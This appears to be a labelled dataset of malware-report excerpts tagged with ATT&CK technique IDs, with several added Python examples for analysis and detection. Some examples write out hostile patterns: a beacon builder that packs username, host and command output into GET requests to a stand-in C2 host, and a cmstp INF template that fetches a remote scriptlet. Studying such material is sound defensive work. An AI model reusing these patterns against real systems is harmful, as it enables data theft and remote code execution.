{"text1":"Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection","labels":"['T1489']"}
|
|
{"text1":"For instance, the character A would be represented by the two characters 41, which is the hexadecimal representation of that character. The run command (1) creates the process cmd.exe \/c with the command parameters appended and will write the output of the command in hexadecimal format to the file %APPDATA%\\tmpCa.vbs. The Trojan will then read the hexadecimal formatted contents of this file in 1500 byte blocks, sending each 1500 bytes of data from the file to the C2 server via an HTTP GET request to a URL with the following structure: http:\/\/<c2 domain>\/resp. hex(Environment.UserName\/Environment.MachineName)>AAZ<hex(command prompt output)> The upload command (2) writes data provided by the C2 to a specified file. hex(Environment.UserName\/Environment.MachineName)>AAZ<hex(\"File Uploaded\")> The download command (3) reads the contents of a specified file and sends the data to the C2 server. If the file does not exist, the Trojan will send the C2 server a message < File Not Found > by sending the following URL: http:\/\/<c2 domain>\/resp. hex(Environment.UserName\/Environment.MachineName)>AAZ<hex(\"< File Not Found >\")> If the file exists, the Trojan will read the contents of the specified file and compress the contents using the GZipStream class. The Trojan then gets the hexadecimal values of the compressed data and will replace the following hexadecimal values on each line with ASCII characters to further compress the data","labels":"['T1560.003']"}
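Added example, not the Trojan's code: an encoder and parser for the beacon format the entry above describes. The page gives the hex encoding ("A" becomes "41"), the 1500-character blocks per GET request, the hex(username/machinename) identifier, the "AAZ" separator and the "resp." URL prefix. What is assumed here: that the hex follows "resp." directly, that the hex is uppercase, and the domain c2.example. The additional per-line substitution step the page mentions is not specified there and is left out. All sample traffic is constructed.

```python
"""Encoding and parsing a hex-over-HTTP-GET beacon with an AAZ separator."""
import gzip
from urllib.parse import urlparse

BLOCK = 1500          # hex characters sent per GET request, per the page
SEPARATOR = "AAZ"     # unambiguous: 'Z' is not a hex digit, so AAZ cannot occur inside hex text
PREFIX = "/resp."     # assumed placement of the hex right after "resp."


def hexify(data):
    return data.hex().upper()


def build_requests(c2_domain, username, machine, payload, compress=False):
    """Client side: one URL per 1500-character block of the hex-encoded payload."""
    if compress:                       # the download command gzips file contents first
        payload = gzip.compress(payload, mtime=0)
    ident = hexify(f"{username}/{machine}".encode())
    body = hexify(payload)
    blocks = [body[i:i + BLOCK] for i in range(0, len(body), BLOCK)] or [""]
    return [f"http://{c2_domain}{PREFIX}{ident}{SEPARATOR}{block}" for block in blocks]


def parse_request(url):
    """Server/analyst side: split one URL back into (username, machine, raw bytes)."""
    path = urlparse(url).path
    if not path.startswith(PREFIX):
        raise ValueError("not a beacon URL")
    ident_hex, sep, block_hex = path[len(PREFIX):].partition(SEPARATOR)
    if sep != SEPARATOR:
        raise ValueError("missing AAZ separator")
    username, _, machine = bytes.fromhex(ident_hex).decode().partition("/")
    return username, machine, bytes.fromhex(block_hex)


def reassemble(urls):
    """Concatenate the blocks of a multi-request upload and undo gzip if present."""
    data = b"".join(parse_request(u)[2] for u in urls)
    if data[:2] == b"\x1f\x8b":        # gzip magic; raw output starting with these bytes is unlikely
        data = gzip.decompress(data)
    return data


# Constructed sample traffic: 1148 bytes of command output (2296 hex characters,
# so two requests) and the "file not found" reply described on the page.
SAMPLE_OUTPUT = b"Windows IP Configuration\r\n\r\n" + b"   Host Name . . . : WKS01\r\n" * 40
SAMPLE_URLS = build_requests("c2.example", "alice", "WKS01", SAMPLE_OUTPUT)
NOT_FOUND_URL = build_requests("c2.example", "alice", "WKS01", b"< File Not Found >")[0]

if __name__ == "__main__":
    for url in SAMPLE_URLS:
        user, host, chunk = parse_request(url)
        print(user, host, len(chunk), "bytes")
    print(reassemble(SAMPLE_URLS) == SAMPLE_OUTPUT)
```

For detection, the same parser applied to proxy logs gives a cheap signature: a GET path beginning with "resp." whose remainder is hex on both sides of a literal "AAZ", with the left side decoding to a username/hostname pair.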
|
|
{"text1":"Talos has discovered an unknown Remote Administration Tool that we believe has been in use for over 3 years. During this time it has managed to avoid scrutiny by the security community. The current version of the malware allows the operator to steal files, keystrokes, perform screenshots, and execute arbitrary code on the infected host. Talos has named this malware KONNI. Throughout the multiple campaigns observed over the last 3 years, the actor has used an email attachment as the initial infection vector. They then use additional social engineering to prompt the target to open a .scr file, display a decoy document to the users, and finally execute the malware on the victim's machine. The malware infrastructure of the analysed samples was hosted by a free web hosting provider: 000webhost. The malware has evolved over time","labels":"['T1059.003']"}
|
|
{"text1":"These events will run respectively at 15:30:40 and when the system uptime is between 300 and 400 seconds. The variable $HL39fjh contains the base64-encoded PowerShell command shown in Figure 2. It reads the Windows Registry key where the encrypted payload is stored, and contains the password and the salt needed to decrypt the payload","labels":"['T1012']"}
|
|
{"text1":"This transport library does not appear on disk in its PE format. It is maintained as encrypted resource 107 in the orchestrator module, then decrypted and loaded by the orchestrator directly into the memory of the target process. This C2 interaction module is independent, once started, it interacts with the orchestrator using its local named pipe","labels":"['T1027']"}
|
|
{"text1":"Finally, OverWatch observed AQUATIC PANDA make multiple attempts at credential harvesting by dumping the memory of the LSASS process3 using living-off-the-land binaries rdrleakdiag.exe and cdump.exe \u2014 a renamed copy of createdump.exe. The threat actor used winRAR to compress the memory dump in preparation for exfiltration before attempting to cover their tracks by deleting all executables from the ProgramData and Windows\\temp\\ directories","labels":"['T1003.001', 'T1560.001']"}
|
|
{"text1":"The inclusion of both phone and IMSI numbers shows the highly targeted nature of this cyber intrusion. If an SMS message contained either a phone number or an IMSI number that matched the predefined list, it was saved to a CSV file for later theft by the threat actor","labels":"['T1074.001', 'T1119']"}
|
|
{"text1":"The program CrashReporter.exe is heavily obfuscated with the ADVObfuscation library, renamed \u201csnowman\u201d (Obfuscated Files or Information [T1027]). When run, it checks for the Maintain parameter and collects the victim\u2019s host information (System Owner\/User Discovery [T1033]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (Exfiltration Over C2 Channel [T1041]). The program also creates a scheduled SYSTEM task, named JMTCrashReporter, which runs CrashReporter.exe with the Maintain parameter at any user\u2019s login (Scheduled Task\/Job: Scheduled Task [T1053.005","labels":"['T1053.005', 'T1027']"}
|
|
{"text1":"The function hashing algorithm is used to map a hash value of a given function name to its corresponding location in memory using a process known as Run-Time Dynamic Linking. Pre-computed hashes are passed to the hashing algorithm alongside the Windows library containing the related function name. Each function name within the library is hashed; when a match is found, its address is saved","labels":"['T1027']"}
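Added example, not the analysed malware's code: the loop the entry above describes, walking a library's export names, hashing each one and stopping at the name whose hash equals a pre-computed constant, plus the analyst-side inverse that labels hash constants found in a sample. The page does not name the hash function; the ROR-13 rotate-and-add hash common in Windows shellcode is assumed here. The export table is a constructed stand-in and its addresses are made up.

```python
"""Run-time API resolution by hashed export names (ROR-13 assumed)."""
MASK32 = 0xFFFFFFFF


def ror32(value, count):
    """Rotate a 32-bit value right by `count` bits."""
    return ((value >> count) | (value << (32 - count))) & MASK32


def ror13_hash(name):
    """h = ror(h, 13) + byte over the ASCII bytes of the name (no terminator)."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & MASK32
    return h


# Constructed export table standing in for kernel32's export directory;
# the addresses are placeholders, not real RVAs.
FAKE_EXPORTS = {
    "LoadLibraryA": 0x7FF00001,
    "GetProcAddress": 0x7FF00002,
    "VirtualAlloc": 0x7FF00003,
    "CreateRemoteThread": 0x7FF00004,
    "WriteProcessMemory": 0x7FF00005,
}


def resolve_by_hash(wanted, exports):
    """What the loader does at run time: hash every export until one matches."""
    for name, address in exports.items():
        if ror13_hash(name) == wanted:
            return name, address
    return None


def build_lookup(exports):
    """Analyst side: precompute hash -> name for a whole export list, refusing collisions."""
    table = {}
    for name in exports:
        h = ror13_hash(name)
        if h in table:
            raise ValueError(f"hash collision: {name} and {table[h]}")
        table[h] = name
    return table


def label_hashes(hashes, exports):
    """Map hash constants pulled out of a sample back to API names ('?' if unknown)."""
    lookup = build_lookup(exports)
    return [lookup.get(h, "?") for h in hashes]


if __name__ == "__main__":
    constants = [0xEC0E4E8E, ror13_hash("VirtualAlloc"), 0xDEADBEEF]
    print(label_hashes(constants, FAKE_EXPORTS))
```

Hashing the names removes them from the import table and from a strings dump, which is the evasion the technique buys. The usual counter is to precompute the table once over the real export lists of kernel32.dll, ntdll.dll and friends and match constants from the sample against it; if nothing matches, the sample is using a different hash or a per-sample seed and the routine itself has to be lifted from the binary.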
|
|
{"text1":"As mentioned, the registry key (HKLM\\SOFTWARE\\Microsoft\\DRM) is where the malicious payload is stored. In this case, this is the Pillowmint Trojan. Pillowmint is stored and compressed in the registry key","labels":"['T1027']"}
|
|
{"text1":"The ultimate goal of both Type A and B loaders is to de-obfuscate and load a Cobalt Strike Reflective Loader in memory. At the conclusion of the de-obfuscation process, both variants proceed to load the Reflective Loader in memory, which subsequently executes Cobalt Strike Beacon in memory","labels":"['T1027.002', 'T1140', 'T1140']"}
|
|
{"text1":"The second module is used by the operators to execute an obfuscated PowerShell script, which contains a Meterpreter downloader widely known as \u201cTinymet\u201c. This downloader, seen in past FIN7 campaigns, downloads a one-byte XOR-encrypted (eg. with the key equal to 0x50 or 0x51) piece of meterpreter shellcode to execute","labels":"['T1059.001']"}
|
|
{"text1":"TrickBot sends the reconnaissance information from the target machine to a hardcoded C2 server. The C2 server is responsible for handling the stolen data","labels":"['T1041']"}
|
|
{"text1":"This can potentially bypass application whitelisting since all processes spawned during the attack are legitimate Microsoft executables","labels":"['T1055.012']"}
|
|
{"text1":"Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple\u2019s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple\u2019s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs","labels":"['T1059.004']"}
|
|
{"text1":"IRON TWILIGHT\u2019s email credential targeting system allows the threat group to target and exploit accounts for webmail services such as Gmail and Hotmail, as well as corporate email platforms that use webmail interfaces. When targeting email services that provide alternate methods to authenticate account access, such as Gmail\u2019s use of OAuth, the threat actors may abuse this feature to maintain a persistent session with the compromised account","labels":"['T1566.002']"}
|
|
{"text1":"From these web shells, they launched reconnaissance commands, stole data, and dropped additional tools including portqry.exe, renamed cmd.exe, winrar, and the notorious hTran","labels":"['T1105']"}
|
|
{"text1":"kaudited \u2014 A file installed as \/usr\/bin\/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won\u2019t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions","labels":"['T1547.006']"}
|
|
{"text1":"2) When contacted, the Google Drive link retrieves a zip file, which contains a .lnk file obfuscated as a .pdf file using the double extension trick. 3) This file requires the target to attempt to open the .lnk file, which redirects the user to a Windows Scripting Component (.wsc) file, hosted on an adversary-controlled microblogging page. MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs. 4) The .lnk file uses an embedded VBScript component to retrieve a decoy PDF file and a PowerShell script from the adversary-controlled web page","labels":"['T1059.005']"}
|
|
{"text1":"On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. In both attacks, the OilRig group attempted to deliver a new Trojan that we are tracking as OopsIE. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year earlier, in January 2017. A New Attack: On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. In the January 16, 2018 attack, we observed OilRig attacking an organization it previously targeted in January 2017. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. The primary difference was that this sample was encrypted and password protected, requiring the victim to enter a password, likely provided by the adversary, to view the document. Password-protected documents are commonly used by adversaries as an evasion tactic to bypass automated analysis mechanisms, since successful execution depends on the password. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time","labels":"['T1204.002']"}
|
|
{"text1":"In the list of dropped files, VMwareCplLauncher.exe is a legitimate, signed VMware executable that serves to ultimately deliver the BADNEWS payload. The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool. After the files are dropped, the VMwareCplLauncher.exe executable is run, which in turn loads the vmtools.dll DLL file. This DLL file creates a scheduled task named BaiduUpdateTask1, which attempts to run the malicious, spoofed MSBuild.exe every subsequent minute. The technique of having a signed, legitimate, executable load a malicious library is commonly referred to as side-loading, and has been witnessed in a number of campaigns and malware families in the past. The flow of execution from the time the victim opens the malicious Microsoft Word document, to the execution of BADNEWS, may be seen below","labels":"['T1053.005', 'T1574.002']"}
|
|
{"text1":"NavRAT is a remote access trojan (RAT) designed to upload, download and execute files. This screenshot shows the log messages during the process injection with the API usage. NavRAT starts by copying itself (~emp.exe) to the %ProgramData%\\Ahnlab\\GoogleUpdate.exe path. NavRAT then creates a registry key in order to execute this file copy at the next reboot of the system, an initial method of persistence. The log files mentioned previously are stored in the same directory as NavRAT on the victim machine, again making it easy for us to find and analyse the additional log files. NavRAT has support for process injection. By using this method, it will copy itself into a running Internet Explorer process in order to avoid detection by running as an independent process","labels":"['T1055']"}
|
|
{"text1":"File hunting plugin: The most frequently used plugin, similar to one used in 2014. Often used to collect Office files from temporary internet history. Detailed survey plugin: Used to gather domain membership, processes\/loaded modules, hardware enumeration, installed products, logical and mapped drive information. Evolution of earlier plugin used in 2014. Browser plugin: Used to steal browser history, stored passwords and sessions. Works with Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex. File listing plugin: Works on local or remote drives and can map additional paths when given credentials","labels":"['T1555.003']"}
|
|
{"text1":"X-Session: 0\"). Its presence on a compromised system allows a threat actor to execute a wide variety of commands, including uploading and downloading files, and spawning a reverse shell. The malware can be configured to use multiple network protocols to avoid network-based detection. DLL side loading is often used to maintain persistence on the compromised system. Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes. DLL side loading has been used to maintain persistence on the compromised system. - ChinaChopper web shell \u2014 A web-based executable script (see Figure 4) that allows a threat actor to execute commands on the compromised system. The server-side component provides a simple graphical user interface for threat actors interacting with web shells. TG-3390 has used additional web shells containing similarly formatted passwords","labels":"['T1105']"}
|
|
{"text1":"After this registry change, ShowCompColor and ShowInfoTip keys are also modified to disable the display of compressed and encrypted NTFS files in color. This setting allows you to see compressed files in a blue color","labels":"['T1112']"}
|
|
{"text1":"Determine whether the victim\u2019s host machine is running Windows with an x86 or x64 architecture. Parse the contents of a corresponding textbox within the document and convert it to a command line argument specific to the Windows architecture on the victim\u2019s machine","labels":"['T1082']"}
|
|
{"text1":"It was used to overwrite data by the BE2 actor, destroying data stored on hard drives by overwriting file contents. While its use may be intended to cover their tracks, it is heavy handed to use this type of tool to cover one\u2019s tracks in a network. Most likely it is a tool of sabotage, much like the Destover wiper seen on Sony Pictures Entertainment\u2019s networks. Instead of re-using the commercial EldoS RawDisk drivers in their malware, the BE2 developers wrote their own low-level disk and file destruction routines","labels":"['T1485']"}
|
|
{"text1":"After successfully exporting mail they wished to steal, the attacker would remove the evidence of the export request using Remove-MailboxExportRequest","labels":"['T1070']"}
|
|
{"text1":"Once executed, NavRAT will immediately leverage cmd.exe to perform a systeminfo and a tasklist check on the system it is running on while writing the output to a TMP file, once again attempting to hide within an AhnLab folder. Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file","labels":"['T1074.001']"}
|
|
{"text1":"However, what happened was that the actor resized the Certificate Table in the digitally signed \u2018vac.dll\u2019 and inserted their own data in the Certificate Table so it doesn\u2019t affect the digital signature","labels":"['T1553.002']"}
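Added example, not from the page or from any vendor tooling: a check for the trick the entry above describes. The Attribute Certificate Table as a whole is excluded from the Authenticode hash, so enlarging the table entry and storing data after the PKCS#7 signature leaves the signature valid. The check compares the entry's declared dwLength with the length of the DER SEQUENCE it actually contains; anything beyond 8-byte alignment padding was not put there by a signing tool. The sample PE is a constructed, header-only PE32+ image whose "signature" is only structurally shaped like one and cannot be verified.

```python
"""Detecting data smuggled into a PE file's Attribute Certificate Table."""
import struct

SECURITY_DIR_INDEX = 4      # IMAGE_DIRECTORY_ENTRY_SECURITY
WIN_CERT_HEADER = 8         # dwLength(4) + wRevision(2) + wCertificateType(2)


def security_directory(pe):
    """Return (file offset, size) of the certificate table; size 0 means unsigned."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                     # skip signature and IMAGE_FILE_HEADER
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                          # PE32: data directories start at +96
        dirs = opt + 96
    elif magic == 0x20B:                        # PE32+: data directories start at +112
        dirs = opt + 112
    else:
        raise ValueError("unknown optional header magic")
    return struct.unpack_from("<II", pe, dirs + 8 * SECURITY_DIR_INDEX)


def der_total_length(buf):
    """Length of the outermost DER element (tag + length bytes + content)."""
    if buf[0] != 0x30:
        raise ValueError("certificate does not start with a DER SEQUENCE")
    first = buf[1]
    if first < 0x80:
        return 2 + first
    n = first & 0x7F
    return 2 + n + int.from_bytes(buf[2:2 + n], "big")


def certificate_slack(pe):
    """Compare the declared entry length with the PKCS#7 length; report the extra bytes."""
    offset, size = security_directory(pe)
    if size == 0:
        return {"signed": False}
    dw_length, revision, cert_type = struct.unpack_from("<IHH", pe, offset)
    blob = pe[offset + WIN_CERT_HEADER:offset + dw_length]
    der_len = der_total_length(blob)
    slack = blob[der_len:]
    # Entries are padded to 8 bytes, so up to 7 zero bytes are expected; anything
    # longer, or non-zero, was appended by someone other than the signing tool.
    suspicious = len(slack) > 7 or any(slack)
    return {"signed": True, "revision": revision, "type": cert_type, "dwLength": dw_length,
            "der_length": der_len, "slack": slack, "suspicious": suspicious}


def build_sample_pe(appended=b""):
    """Constructed PE32+ header with one WIN_CERTIFICATE entry, optionally with data appended."""
    body = b"\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x07\x02" + b"\x00" * 289   # 300 bytes, content irrelevant
    pkcs7 = b"\x30\x82" + len(body).to_bytes(2, "big") + body               # SEQUENCE, 304 bytes total
    cert = pkcs7 + appended
    cert += b"\x00" * (-len(cert) % 8)                                      # 8-byte alignment padding
    entry = struct.pack("<IHH", WIN_CERT_HEADER + len(cert), 0x0200, 0x0002) + cert
    cert_offset = 0x200
    dos = b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x40)                     # e_lfanew = 0x40
    file_header = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)
    optional = bytearray(240)
    struct.pack_into("<H", optional, 0, 0x20B)
    struct.pack_into("<II", optional, 112 + 8 * SECURITY_DIR_INDEX, cert_offset, len(entry))
    headers = dos + b"PE\x00\x00" + file_header + bytes(optional)
    return headers.ljust(cert_offset, b"\x00") + entry


if __name__ == "__main__":
    print(certificate_slack(build_sample_pe()))
    print(certificate_slack(build_sample_pe(b"ATTACKER-DATA")))
```

Windows' own verifier historically accepted such trailing bytes, which is the behaviour fixed by the opt-in stricter check of CVE-2013-3900, so a valid signature alone says nothing about the table's tail; running this check over signed binaries found in unusual paths is a cheap way to surface the abuse.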
|
|
{"text1":"Tomiris is a backdoor written in Go whose role is to continuously query its C2 server for executables to download and execute on the victim system. Before performing any operations, it sleeps for at least nine minutes in a possible attempt to defeat sandbox-based analysis systems","labels":"['T1497.003']"}
|
|
{"text1":"The observed JSS Loader infection led to the download and execution of a setup VBScript from https[:]\/\/petshopbook[.]com. This script installs a custom Sekur PS stager to %LOCALAPPDATA%\\Microsoft\\WindowsDefender\\ClearTemp.ps1 and establishes persistence for this stager with a second VBS that is launched by a scheduled task","labels":"['T1053.005']"}
|
|
{"text1":"We found four different trojaned binaries in use since July 2019. The 5kplayer, driver pack and Firefox trojanized software use a service to achieve persistence. The VPNpro trojanized application uses an AutoRun registry key, as mentioned in the publication released before July 2019. After that, it will check if ESET or BitDefender antivirus are installed before dropping the malware","labels":"['T1562.001']"}
|
|
{"text1":"Security researchers previously discovered Transparent Tribe using sharingmymedia[.]com to host Android malware targeting Indian military and defense personnel. Figure 1: Maldoc masquerading as a congratulatory notice from CLAWS. Figure 2 shows the attackers' use of HTTrack, a free website copier program, to duplicate a legitimate website to use for their own malicious purposes. These examples highlight Transparent Tribe's heavy reliance on social engineering as a core TTP and the group's efforts to make their operations appear as legitimate as possible. Figure 2: Fake website cloned using HTTrack on May 29, 2020. Lures and targeting: Transparent Tribe uses a variety of themes in their lures that evolved over time. Defense-themed lures: Transparent Tribe has historically used military and defense themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. HoneyTraps: Transparent Tribe consistently uses alluring documents and file names, commonly referred to as honeytraps, to trick victims into executing malicious content on their endpoints. Transparent Tribe also delivers malicious archives containing CrimsonRAT executables using various themes, including honeytraps. Conclusion: Transparent Tribe relies heavily on the use of maldocs to spread their Windows implants. Transparent Tribe uses generically themed content-hosting domains as well as malicious domains masquerading as legitimate defense-related websites","labels":"['T1189']"}
|
|
{"text1":"An interesting fact is that the ransomware enumerates all running processes and compares the hashed name of each process with embedded hash values","labels":"['T1057']"}
|
|
{"text1":"Once the macro collected all the information, it sends the data to the C2 server over an HTTP POST request","labels":"['T1071.001']"}
|
|
{"text1":"The threat actor gave considerable effort to obfuscating the code of this new Anchor_DNS variant using stack strings, string encryption, and by implementing a packer. The following example shows considerable changes in the code of the WinMain() function between an older variant of Anchor_DNS and the new variant","labels":"['T1027']"}
|
|
{"text1":"The main function within the ISMInjector assembly uses the Joiner module to construct the final payload and the Inner module to inject the final payload into a process. Figure 4 shows the ISMInjector\u2019s main function that uses the two modules to carry out its injection process before exiting","labels":"['T1055.012']"}
|
|
{"text1":"Forensic examination of a computer infected with a banking trojan. Oleg Skulkin, Senior Digital Forensics Analyst at Group-IB. Where did it all start? Since then, phishing emails distributing the trojan have been sent to potential victims with admirable persistence. In this article, I am going to show how to perform forensic analysis of an image of a computer infected with the RTM banking trojan. Let's try to find registry files, such as SOFTWARE, for example. Let's recall Jesse Kornblum's paradox: \"Malware can hide, but it must run\". A good start will be to look for potential persistence mechanisms that can be used by the malware to restart after reboot. Let's start with simple things: we will take the NTUSER.DAT registry file with the latest modification date from the user directory (C:\\Users\\%username%\\), and extract data from it using RegRipper. Let's start with low-hanging fruits, the so-called run keys: The partition was last modified on November 7th, and we see that when a user logs in, the apg.exe file is executed from a very suspicious location. Let's see what else we can find in the b7mg81 directory: TeamViewer. Let's take a closer look at apg.exe and use PPEE: This looks like TeamViewer and is signed as TeamViewer, so does this mean it indeed is TeamViewer? Another interesting file is TeamViewer.ini: Here is anti-forensics: according to the configuration file, our \"TeamViewer\" did not keep any logs, and was apparently used as a RAT (Remote Access Trojan). Well, not bad","labels":"['T1547.001']"}
|
|
{"text1":"The attackers manually send a command to the JS or C# component to drop and execute a batch file from one of their servers. That batch file writes a malicious INF file and supplies it as a parameter to the Microsoft utility cmstp.exe, which executes a remote scriptlet specified in the INF file. The remote scriptlet contains obfuscated JS code that drops an OCX file and executes it via regsvr32.exe","labels":"['T1218.010']"}
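Added example, not the actors' code: a parser that pulls the remote scriptlet reference out of an INF of the kind the entry above describes (written by the batch file, then handed to cmstp.exe). The INF below is constructed after the publicly documented cmstp technique, in which a RegisterOCXs or UnRegisterOCXs section loads scrobj.dll with a URL as its argument; the section names and the URL (c2.example) are made up for the example.

```python
"""Finding the remote scriptlet a cmstp.exe INF file points at."""
import re

OCX_KEYS = {"registerocxs", "unregisterocxs"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def parse_inf(text):
    """Split an INF into {section name (lowercased): [entry lines]}, dropping ';' comments."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def find_scriptlet_references(text):
    """Follow every *RegisterOCXs key to its section and report scrobj.dll entries."""
    sections = parse_inf(text)
    hits = []
    for section, entries in sections.items():
        for entry in entries:
            key, _, value = entry.partition("=")
            if key.strip().lower() not in OCX_KEYS:
                continue
            target = value.strip().lower()
            for ocx_entry in sections.get(target, []):
                if "scrobj.dll" in ocx_entry.lower():
                    match = URL_RE.search(ocx_entry)
                    hits.append({"install_section": section, "ocx_section": target,
                                 "entry": ocx_entry, "url": match.group(0) if match else None})
    return hits


# Constructed INF in the shape of the cmstp scriptlet technique (not a real sample)
SAMPLE_INF = r"""
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,http://c2.example/payload.sct   ; scrobj.dll fetches and runs the scriptlet

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
"""

if __name__ == "__main__":
    for hit in find_scriptlet_references(SAMPLE_INF):
        print(hit)
```

On the endpoint the same activity shows up as cmstp.exe started with an INF path on its command line and then making an outbound HTTP request, followed by regsvr32.exe loading a freshly written OCX; the parser above is for the file-level side, turning a recovered INF into the URL to block and hunt for.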
|
|
{"text1":"Almost exclusively, Unit 42 has seen the use of weaponized documents that require user execution. Only once in the last six months have we seen use of exploits to circumvent the need for the user to execute any part of the installation chain","labels":"['T1203']"}
|
|
{"text1":"The attacker created password-protected archives on the victims' OWA server so that they could be exfiltrated via a simple HTTP request","labels":"['T1048.002']"}
|
|
{"text1":"This extreme level of variance was also applied to non-executable entities, such as WMI persistence filter name, WMI filter query, passwords used for 7-zip archives, and names of output log files. Camouflage and blending into the environment: tools (such as the legitimate ADFIND utility) were always renamed and placed in folders that mimicked existing programs and files already present on a machine. This blending was not just used for files, but for other elements. For example, WMI persistence filters were created with names and queries matching other scripts present in affected organizations. The firewall rules were also methodically removed after the network reconnaissance was completed. Lateral movement activities were never executed without preparation. To increase the likelihood that their activities remain undetected, the attackers first enumerated remote processes and services running on the target host and decided to move laterally only after disabling certain security services","labels":"['T1036.005']"}
|
|
{"text1":"Finally, REvil ransomware marks its binary code for deletion during the next reboot and terminates execution","labels":"['T1070.004']"}
|
|
{"text1":"For example, we recently disclosed the activities of one of those teams (dubbed Tsar team) surrounding the use of mobile malware. This team has previously launched campaigns targeting the United States and European intelligence communities, militaries, defense contractors, news organizations, NGOs and multilateral organizations. It has also targeted jihadists and rebels in Chechnya","labels":"['T1027']"}
|
|
{"text1":"ESET has recently discovered that the BlackEnergy trojan was recently used as a backdoor to deliver a destructive KillDisk component in attacks against Ukrainian news media companies and against the electrical power industry. In this blog, we provide details on the BlackEnergy samples ESET has detected in 2015, as well as the KillDisk components used in the attacks. Furthermore, we examine a previously unknown SSH backdoor that was also used as another channel of accessing the infected systems, in addition to BlackEnergy","labels":"['T1133']"}
|
|
{"text1":"Given this extended period, it is logical to assume that some credentials obtained by the threat actor would be rotated during normal business operations. To combat this, the threat actor periodically \u201crefreshed\u201d their credential set by performing credential theft activities in an already compromised environment. At one victim, CrowdStrike identified multiple instances of domain credential theft months apart, each time with a different credential theft technique","labels":"['T1589.001']"}
|
|
{"text1":"Case in point: Last week, we came across a worm (detected by Trend Micro as Worm.Win32.BLADABINDI.AA) that propagates through removable drives and installs a fileless version of the BLADABINDI backdoor","labels":"['T1120']"}
|
|
{"text1":"The TrickBot modules used for discovery include networkdll and psfin. TrickBot downloads modules for collecting local system information and scouting the network, primarily part of the networkdll module. This module has a battery of command line, WMI and LDAP queries to gather information, and then exfiltrate the data to GRIM SPIDER for review. The psfin module has a similar purpose but specifically searches for financial and point-of-sales indicators","labels":"['T1047', 'T1074', 'T1018']"}
|
|
{"text1":"The core Karagany implant does not delete any of the plugins it downloads, although some of the plugins are designed to self-delete. This oversight facilitates high-fidelity forensic analysis of the majority of plugin activity carried out over the duration of the intrusion and allows a detailed timeline of threat actor activity to be compiled. The malware also creates a directory that is used for storing both plugin output data and to stage data for exfiltration. The ascending numerical value of these directories likely indicates malware versioning","labels":"['T1074.001']"}
|
|
{"text1":"The second portion of EnvyScout is a modified version of the open-source tool FileSaver, which is intended to assist in the writing of files to disk via JavaScript. This methodology may circumvent static analysis of known malicious file types by obscuring them within dynamically altered content upon execution","labels":"['T1059.007']"}
|
|
{"text1":"It can terminate the IDA debugger, x32dbg, OllyDbg and other processes to avoid dynamic analysis, and close databases, office programs and security tools","labels":"['T1562.001']"}
|
|
{"text1":"OwaAuth is a web shell that is installed as an ISAPI filter on Exchange servers and shares characteristics with the ChinaChopper web shell. In addition to acting as a web shell, the malware captures and DES-encrypts credentials before writing the username and password to disk. The OwaAuth web shell enables a threat actor to upload and download files, launch processes, and execute SQL queries","labels":"['T1056.001', 'T1505.003']"}
|
|
{"text1":"Linux\/Ebury is noteworthy for multiple reasons. Although this is something common under the Windows operating system, it is the first time we\u2019ve seen a malicious library being used on POSIX systems. Linux\/Ebury also uses innovative tricks to hook functions, discover the address space of the ELF executable that loaded the library and apply patches to its code at runtime. We believe that before using the external library to hook into OpenSSH processes, the author of Linux\/Ebury used a patch to modify the source code of OpenSSH, thereby adding \u201cnew functionalities\u201d to the software. The first variants found were modified binaries left on the disk. We have also seen usage of the rpm commands to remove signature from the original OpenSSH packages (openssh-server, openssh-clients) and modify the RPM database to update the file hashes with those of the malicious files. This will make the output of rpm --verify openssh-servers report the files as unmodified. However, the output from rpm -qi openssh-servers will clearly show the package is missing its signatures","labels":"['T1553.002']"}
|
|
